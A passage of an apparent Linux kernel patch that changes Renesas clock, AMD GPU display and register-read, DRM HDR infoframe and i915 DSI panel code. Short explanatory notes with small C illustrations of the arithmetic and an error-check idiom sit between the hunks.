+-		if (mod_clks[i].id == clks[j].clk) {
+-			mod_clks[i].parent = clks[j].parent;
+-			j++;
+-		}
+-}
+-
+ MODULE_DESCRIPTION("Renesas CPG/MSSR Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.h b/drivers/clk/renesas/renesas-cpg-mssr.h
+index 1c3c057d17f53..80c5b462924ac 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.h
++++ b/drivers/clk/renesas/renesas-cpg-mssr.h
+@@ -187,21 +187,7 @@ void __init cpg_mssr_early_init(struct device_node *np,
+     /*
+      * Helpers for fixing up clock tables depending on SoC revision
+      */
+-
+-struct mssr_mod_reparent {
+-	unsigned int clk, parent;
+-};
+-
+-
+-extern void cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk);
+ extern void mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n);
+-extern void mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n);
+ #endif
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index 6853b93ac82e7..df3388e8dec00 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -393,9 +393,10 @@ static int nv_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(nv_allowed_read_registers); i++) {
+ 		en = &nv_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = nv_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 7cd17dda32ceb..2eddd7f6cd41e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -439,8 +439,9 @@ static int soc15_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc15_allowed_read_registers); i++) {
+ 		en = &soc15_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-			reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+ 					+ en->reg_offset))
+ 			continue;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 7050238c4c489..3d938b52178e3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -48,19 +48,31 @@
+ static const struct amd_ip_funcs soc21_common_ip_funcs;
+ 
+ /* SOC21 */
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_encode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn1,
+ };
+ 
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+@@ -69,23 +81,47 @@ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_decode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+-	switch (adev->ip_versions[UVD_HWIP][0]) {
++	if (adev->vcn.num_vcn_inst == hweight8(adev->vcn.harvest_config))
++		return -EINVAL;
+ 
++	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+-		if (encode)
+-			*codecs = &vcn_4_0_0_video_codecs_encode;
+-		else
+-			*codecs = &vcn_4_0_0_video_codecs_decode;
++	case IP_VERSION(4, 0, 4):
++		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		} else {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++		}
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -255,9 +291,10 @@ static int soc21_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc21_allowed_read_registers); i++) {
+ 		en = &soc21_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = soc21_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+index cd4e61bf04939..3ac599f74fea8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+@@ -280,7 +280,7 @@ phys_addr_t kfd_get_process_doorbells(struct kfd_process_device *pdd)
+ 	if (!pdd->doorbell_index) {
+ 		int r = kfd_alloc_process_doorbells(pdd->dev,
+ 						    &pdd->doorbell_index);
+-		if (r)
++		if (r < 0)
+ 			return 0;
+ 	}
+ 
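
The one-character kfd fix is the usual guard for helpers that may return a
non-negative value on success: with such a helper, "if (r)" would treat a
positive result as an error, so the test must be "if (r < 0)". In miniature,
with a hypothetical allocator:

/* Hypothetical: non-negative index on success, negative errno on failure. */
static int alloc_index(void)
{
	return 3;       /* pretend index 3 was handed out */
}

static int caller(void)
{
	int r = alloc_index();

	if (r < 0)      /* "if (r)" would also reject index 3 */
		return r;
	return 0;
}
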
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index e4dbc8353ea33..9c532167ff466 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2149,13 +2149,19 @@ static bool dcn32_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
+-	dc->caps.max_cab_allocation_bytes = 67108864; // 64MB = 1024 * 1024 * 64
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_drr_max_vblank_margin_us = 40;
+ 	dc->caps.subvp_prefetch_end_to_mall_start_us = 15;
+@@ -2592,3 +2598,55 @@ struct pipe_ctx *dcn32_acquire_idle_pipe_for_head_pipe_in_layer(
+ 
+ 	return idle_pipe;
+ }
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans)
++{
++	/*
++	 * DCN32 and DCN321 SKUs may have different sizes for MALL
++	 *  but we may not be able to access all the MALL space.
++	 *  If num_chans is a power of 2, then we can access all
++	 *  of the available MALL space.  Otherwise, we can only
++	 *  access:
++	 *
++	 *  max_cab_size_in_bytes = total_cache_size_in_bytes *
++	 *    ((2^floor(log2(num_chans)))/num_chans)
++	 *
++	 * Calculating the MALL sizes for all available SKUs, we
++	 *  have come up with the following simplified check.
++	 * - we have max_chans which provides the max MALL size.
++	 *  Each channel supports 4MB of MALL so:
++	 *
++	 *  total_cache_size_in_bytes = max_chans * 4 MB
++	 *
++	 * - we have avail_chans which shows the number of channels
++	 *  we can use if we can't access the entire MALL space.
++	 *  It is generally half of max_chans
++	 * - so we use the following checks:
++	 *
++	 *   if (num_chans == max_chans), return max_chans
++	 *   if (num_chans < max_chans), return avail_chans
++	 *
++	 * - exception is GC_11_0_0 where we can't access max_chans,
++	 *  so we define max_avail_chans as the maximum available
++	 *  MALL space
++	 *
++	 */
++	int gc_11_0_0_max_chans = 48;
++	int gc_11_0_0_max_avail_chans = 32;
++	int gc_11_0_0_avail_chans = 16;
++	int gc_11_0_3_max_chans = 16;
++	int gc_11_0_3_avail_chans = 8;
++	int gc_11_0_2_max_chans = 8;
++	int gc_11_0_2_avail_chans = 4;
++
++	if (ASICREV_IS_GC_11_0_0(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_0_max_chans) ?
++			gc_11_0_0_max_avail_chans : gc_11_0_0_avail_chans;
++	} else if (ASICREV_IS_GC_11_0_2(dc->ctx->asic_id.hw_internal_rev)) {
++		return (num_chans == gc_11_0_2_max_chans) ?
++			gc_11_0_2_max_chans : gc_11_0_2_avail_chans;
++	} else { // ASICREV_IS_GC_11_0_3(dc->ctx->asic_id.hw_internal_rev)
++		return (num_chans == gc_11_0_3_max_chans) ?
++			gc_11_0_3_max_chans : gc_11_0_3_avail_chans;
++	}
++}
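
The comment above reduces the usable-MALL formula, max_cab_size_in_bytes =
total_cache_size_in_bytes * (2^floor(log2(num_chans)) / num_chans), to a
per-ASIC table. The 2^floor(log2(n)) term is simply the largest power of two
not exceeding n; the general computation can be sketched directly (this is an
illustration, not the kernel's code):

#include <stdint.h>

/* Largest power of two <= n, for n > 0: clear the lowest set bit
 * until a single bit remains. */
static unsigned int pow2_floor(unsigned int n)
{
	while (n & (n - 1))
		n &= n - 1;
	return n;
}

/* General form of the formula; the driver instead keys the result off
 * known per-SKU channel counts (e.g. 48 chans -> 32 usable). */
static uint64_t usable_mall_bytes(uint64_t total_bytes, unsigned int num_chans)
{
	return total_bytes * pow2_floor(num_chans) / num_chans;
}
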
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 13fbc574910bb..434b743fa4cb7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -134,6 +134,10 @@ void dcn32_restore_mall_state(struct dc *dc,
+ 		struct dc_state *context,
+ 		struct mall_temp_config *temp_config);
+ 
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe);
++
++unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
++
+ /* definitions for run time init of reg offsets */
+ 
+ /* CLK SRC */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index d1f36df03c2ee..1709b6edb89c9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1702,11 +1702,18 @@ static bool dcn321_resource_construct(
+ 	dc->caps.max_cursor_size = 64;
+ 	dc->caps.min_horizontal_blanking_period = 80;
+ 	dc->caps.dmdata_alloc_size = 2048;
+-	dc->caps.mall_size_per_mem_channel = 0;
++	dc->caps.mall_size_per_mem_channel = 4;
+ 	dc->caps.mall_size_total = 0;
+ 	dc->caps.cursor_cache_size = dc->caps.max_cursor_size * dc->caps.max_cursor_size * 8;
+ 	dc->caps.cache_line_size = 64;
+ 	dc->caps.cache_num_ways = 16;
++
++	/* Calculate the available MALL space */
++	dc->caps.max_cab_allocation_bytes = dcn32_calc_num_avail_chans_for_mall(
++		dc, dc->ctx->dc_bios->vram_info.num_chans) *
++		dc->caps.mall_size_per_mem_channel * 1024 * 1024;
++	dc->caps.mall_size_total = dc->caps.max_cab_allocation_bytes;
++
+ 	dc->caps.max_cab_allocation_bytes = 33554432; // 32MB = 1024 * 1024 * 32
+ 	dc->caps.subvp_fw_processing_delay_us = 15;
+ 	dc->caps.subvp_drr_max_vblank_margin_us = 40;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 69e205ac58b25..3b6194f0fe513 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -693,7 +693,9 @@ static bool dcn32_assign_subvp_pipe(struct dc *dc,
+ 		 */
+ 		if (pipe->plane_state && !pipe->top_pipe &&
+ 				pipe->stream->mall_stream_config.type == SUBVP_NONE && refresh_rate < 120 && !pipe->plane_state->address.tmz_surface &&
+-				vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0) {
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] <= 0 ||
++				(vba->ActiveDRAMClockChangeLatencyMarginPerState[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]] > 0 &&
++						dcn32_allow_subvp_with_active_margin(pipe)))) {
+ 			while (pipe) {
+ 				num_pipes++;
+ 				pipe = pipe->bottom_pipe;
+@@ -2451,8 +2453,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_2_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_2_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_2_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+@@ -2630,3 +2635,30 @@ void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ }
++
++bool dcn32_allow_subvp_with_active_margin(struct pipe_ctx *pipe)
++{
++	bool allow = false;
++	uint32_t refresh_rate = 0;
++
++	/* For now, allow SubVP with an active margin only on 2560x1440@60hz
++	 * displays, and only when no scaling is applied.
++	 *
++	 * Restricting this to 2560x1440@60hz enables 4K60 + 1440p60 configs
++	 * for p-state switching.
++	 */
++	if (pipe->stream && pipe->plane_state) {
++		refresh_rate = (pipe->stream->timing.pix_clk_100hz * 100 +
++						pipe->stream->timing.v_total * pipe->stream->timing.h_total - 1)
++						/ (double)(pipe->stream->timing.v_total * pipe->stream->timing.h_total);
++		if (pipe->stream->timing.v_addressable == 1440 &&
++				pipe->stream->timing.h_addressable == 2560 &&
++				refresh_rate >= 55 && refresh_rate <= 65 &&
++				pipe->plane_state->src_rect.height == 1440 &&
++				pipe->plane_state->src_rect.width == 2560 &&
++				pipe->plane_state->dst_rect.height == 1440 &&
++				pipe->plane_state->dst_rect.width == 2560)
++			allow = true;
++	}
++	return allow;
++}
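
The refresh-rate expression above is integer ceiling division in the usual (a + b - 1) / b shape: refresh = ceil(pix_clk / (h_total * v_total)). A standalone check with assumed totals (roughly a 2560x1440@60 reduced-blanking timing; the numbers are illustrative, not taken from the patch):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t pix_clk_hz = 241500000;         /* pix_clk_100hz * 100 */
    uint64_t h_total = 2720, v_total = 1481; /* assumed CVT-RB totals */
    uint64_t frame = h_total * v_total;
    uint32_t refresh = (uint32_t)((pix_clk_hz + frame - 1) / frame);

    printf("refresh = %u Hz\n", refresh);    /* prints 60 */
    return 0;
}
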
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index 0ea406145c1d7..b80cef70fa60f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -534,8 +534,11 @@ void dcn321_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_p
+ 		}
+ 
+ 		/* Override from VBIOS for num_chan */
+-		if (dc->ctx->dc_bios->vram_info.num_chans)
++		if (dc->ctx->dc_bios->vram_info.num_chans) {
+ 			dcn3_21_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_21_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_21_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+diff --git a/drivers/gpu/drm/display/drm_hdmi_helper.c b/drivers/gpu/drm/display/drm_hdmi_helper.c
+index 0264abe552788..faf5e9efa7d33 100644
+--- a/drivers/gpu/drm/display/drm_hdmi_helper.c
++++ b/drivers/gpu/drm/display/drm_hdmi_helper.c
+@@ -44,10 +44,8 @@ int drm_hdmi_infoframe_set_hdr_metadata(struct hdmi_drm_infoframe *frame,
+ 
+ 	/* Sink EOTF is Bit map while infoframe is absolute values */
+ 	if (!is_eotf_supported(hdr_metadata->hdmi_metadata_type1.eotf,
+-	    connector->hdr_sink_metadata.hdmi_type1.eotf)) {
+-		DRM_DEBUG_KMS("EOTF Not Supported\n");
+-		return -EINVAL;
+-	}
++	    connector->hdr_sink_metadata.hdmi_type1.eotf))
++		DRM_DEBUG_KMS("Unknown EOTF %d\n", hdr_metadata->hdmi_metadata_type1.eotf);
+ 
+ 	err = hdmi_drm_infoframe_init(frame);
+ 	if (err < 0)
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index f197f59f6d99b..c0dc5858a7237 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -1070,6 +1070,7 @@ static void drm_atomic_connector_print_state(struct drm_printer *p,
+ 	drm_printf(p, "connector[%u]: %s\n", connector->base.id, connector->name);
+ 	drm_printf(p, "\tcrtc=%s\n", state->crtc ? state->crtc->name : "(null)");
+ 	drm_printf(p, "\tself_refresh_aware=%d\n", state->self_refresh_aware);
++	drm_printf(p, "\tmax_requested_bpc=%d\n", state->max_requested_bpc);
+ 
+ 	if (connector->connector_type == DRM_MODE_CONNECTOR_WRITEBACK)
+ 		if (state->writeback_job && state->writeback_job->fb)
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index d16b30a2dded3..cf5d2f8885f08 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -2043,7 +2043,8 @@ void icl_dsi_init(struct drm_i915_private *dev_priv)
+ 	/* attach connector to encoder */
+ 	intel_connector_attach_encoder(intel_connector, encoder);
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	encoder->devdata = intel_bios_encoder_data_lookup(dev_priv, port);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, encoder->devdata, NULL);
+ 
+ 	mutex_lock(&dev_priv->drm.mode_config.mutex);
+ 	intel_panel_add_vbt_lfp_fixed_mode(intel_connector);
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index a491e6c38875d..ff4e6d0a5ba2f 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -620,14 +620,14 @@ static void dump_pnp_id(struct drm_i915_private *i915,
+ 
+ static int opregion_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+ 	return intel_opregion_get_panel_type(i915);
+ }
+ 
+ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 			      const struct intel_bios_encoder_data *devdata,
+-			      const struct edid *edid)
++			      const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_options *lvds_options;
+ 
+@@ -652,7 +652,7 @@ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 				const struct intel_bios_encoder_data *devdata,
+-				const struct edid *edid)
++				const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_lfp_data *data;
+ 	const struct bdb_lvds_lfp_data_ptrs *ptrs;
+@@ -701,9 +701,9 @@ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int fallback_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+-	return 0;
++	return use_fallback ? 0 : -1;
+ }
+ 
+ enum panel_type {
+@@ -715,13 +715,13 @@ enum panel_type {
+ 
+ static int get_panel_type(struct drm_i915_private *i915,
+ 			  const struct intel_bios_encoder_data *devdata,
+-			  const struct edid *edid)
++			  const struct edid *edid, bool use_fallback)
+ {
+ 	struct {
+ 		const char *name;
+ 		int (*get_panel_type)(struct drm_i915_private *i915,
+ 				      const struct intel_bios_encoder_data *devdata,
+-				      const struct edid *edid);
++				      const struct edid *edid, bool use_fallback);
+ 		int panel_type;
+ 	} panel_types[] = {
+ 		[PANEL_TYPE_OPREGION] = {
+@@ -744,7 +744,8 @@ static int get_panel_type(struct drm_i915_private *i915,
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(panel_types); i++) {
+-		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata, edid);
++		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata,
++									  edid, use_fallback);
+ 
+ 		drm_WARN_ON(&i915->drm, panel_types[i].panel_type > 0xf &&
+ 			    panel_types[i].panel_type != 0xff);
+@@ -2592,6 +2593,12 @@ intel_bios_encoder_supports_edp(const struct intel_bios_encoder_data *devdata)
+ 		devdata->child.device_type & DEVICE_TYPE_INTERNAL_CONNECTOR;
+ }
+ 
++static bool
++intel_bios_encoder_supports_dsi(const struct intel_bios_encoder_data *devdata)
++{
++	return devdata->child.device_type & DEVICE_TYPE_MIPI_OUTPUT;
++}
++
+ static int _intel_bios_hdmi_level_shift(const struct intel_bios_encoder_data *devdata)
+ {
+ 	if (!devdata || devdata->i915->display.vbt.version < 158)
+@@ -2642,7 +2649,7 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ {
+ 	struct drm_i915_private *i915 = devdata->i915;
+ 	const struct child_device_config *child = &devdata->child;
+-	bool is_dvi, is_hdmi, is_dp, is_edp, is_crt, supports_typec_usb, supports_tbt;
++	bool is_dvi, is_hdmi, is_dp, is_edp, is_dsi, is_crt, supports_typec_usb, supports_tbt;
+ 	int dp_boost_level, dp_max_link_rate, hdmi_boost_level, hdmi_level_shift, max_tmds_clock;
+ 
+ 	is_dvi = intel_bios_encoder_supports_dvi(devdata);
+@@ -2650,13 +2657,14 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ 	is_crt = intel_bios_encoder_supports_crt(devdata);
+ 	is_hdmi = intel_bios_encoder_supports_hdmi(devdata);
+ 	is_edp = intel_bios_encoder_supports_edp(devdata);
++	is_dsi = intel_bios_encoder_supports_dsi(devdata);
+ 
+ 	supports_typec_usb = intel_bios_encoder_supports_typec_usb(devdata);
+ 	supports_tbt = intel_bios_encoder_supports_tbt(devdata);
+ 
+ 	drm_dbg_kms(&i915->drm,
+-		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
+-		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp,
++		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d DSI:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
++		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp, is_dsi,
+ 		    HAS_LSPCON(i915) && child->lspcon,
+ 		    supports_typec_usb, supports_tbt,
+ 		    devdata->dsc != NULL);
+@@ -2709,6 +2717,8 @@ static void parse_ddi_port(struct intel_bios_encoder_data *devdata)
+ 	enum port port;
+ 
+ 	port = dvo_port_to_port(i915, child->dvo_port);
++	if (port == PORT_NONE && DISPLAY_VER(i915) >= 11)
++		port = dsi_dvo_port_to_port(i915, child->dvo_port);
+ 	if (port == PORT_NONE)
+ 		return;
+ 
+@@ -3199,14 +3209,26 @@ out:
+ 	kfree(oprom_vbt);
+ }
+ 
+-void intel_bios_init_panel(struct drm_i915_private *i915,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid)
++static void intel_bios_init_panel(struct drm_i915_private *i915,
